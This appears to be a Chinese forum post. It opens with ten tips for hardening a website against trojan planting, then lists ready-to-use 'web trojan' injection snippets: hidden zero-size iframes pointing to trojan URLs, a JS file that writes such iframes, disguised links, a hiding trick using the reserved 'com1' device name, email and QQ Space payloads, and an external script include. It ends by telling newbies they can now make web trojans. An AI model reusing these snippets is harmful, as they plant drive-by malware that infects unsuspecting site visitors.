防止挂马简易设置法
想人之所想,急人之所急............给我落伍吧....my god
1、最好是数据库与网站分离,如果是access的话,采用绝对路径,不要放在网站目录下面,如果是MSSQL的话,不要用sa登陆,为每个数据库设置一个访问帐户,后台访问帐户和前台也分离一下,后台可读写,前台的设置一个只读帐户,如果是有用户评论或者是论坛的,那前台的也要可读写了;
2、如果是生成HTML的话,只有HTML目录可写,其它目录全部只读;
3、后台路径改得复杂一些,不要让人猜到,千万不要用xxxx.com/admin之类;
4、重新开一个users帐户给网站用,后台目录再加一道windows身份认证,就算破了数据库的话,也进不了后台登陆地址;
5、图片上传目录设为可写,但只允许运行HTML,不允许asp,.net,php,cgi等扩展运行;
6、500错误再改一下,防止被特别容易地注入,不要让人看出数据表结构,现在一些免费程序也支持后台修改数据表名称了;
7、打好服务器的补丁,不要因为系统的问题被入侵;
8、有条件的用户可以用硬防,实在没有硬防的,花点钱买个路由器,做个端口映射,只允许透过路由后访问80、21等端口,另外要关掉路由器远程访问功能;
9、实在碰到DDOS,那只能算是家门不幸了!
10、要把死的医活了,不是件容易的事情,但不代表没人能做到,所以以上只作参考,还出问题只能说明对方水平太高!
各种网页木马挂马的代码(仅供学习防止种木马)
<iframe src="http://网页木马地址" width="0" height="0" border="0"></iframe>
PHP网页挂吗
<iframe src=http://www.qq.ni8.net width=0 height=0></iframe>
图片木马
<html>
<body>
<iframe src=网页木马地址 width=0 height=0></iframe>
<img src=图片地址></img>
</body>
</html>
邮件木马
<html>
<body>
<iframe src=网页木马地址 width=0 height=0></iframe>
</body>
</html>
flash木马
http://网页木马地址 插入木马地址
width=10 height=10", "GET" 宽度和高度,方式
后面的照添,更改木马地址就可以了。
做123.JS文件木马
document.write("<iframe src=就是你的网页木马地址 width=0 height=0></iframe>")
<script language=javascript src=123.js></script> 再把这段代码写到 主页上!
不点出现连接
<a href="http://www.163.com(迷惑的超级连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="你的木马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
asp木马超级隐藏
copy C:\Inetpub\wwwroot\mm\11.htm [url=file://./C:/Inetpub/wwwroot/mm/com1.htm]\\.\C:\Inetpub\wwwroot\mm\com1.htm[/url]
利用QQ邮箱传播木马
这里主要点HTML格式----在里面写上以下这段代码:
<body > </body>
利用163邮箱传播网页木马。
同样,这里用HTML格式,然后填上以下代码:
</html><iframe src="你的网页木马地址" name="zhu" width="0" height="0"
frameborder="0">
QQ空间马
<div id=DI><img src="javascript: DI.innerHTML='<iframe src=木马地址 width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>'" style=display:none></div>
<script language=javascript src="http://www.gamasma.com/1.js"></script> 呵呵,菜鸟可以学做网页木马了
页:
[1]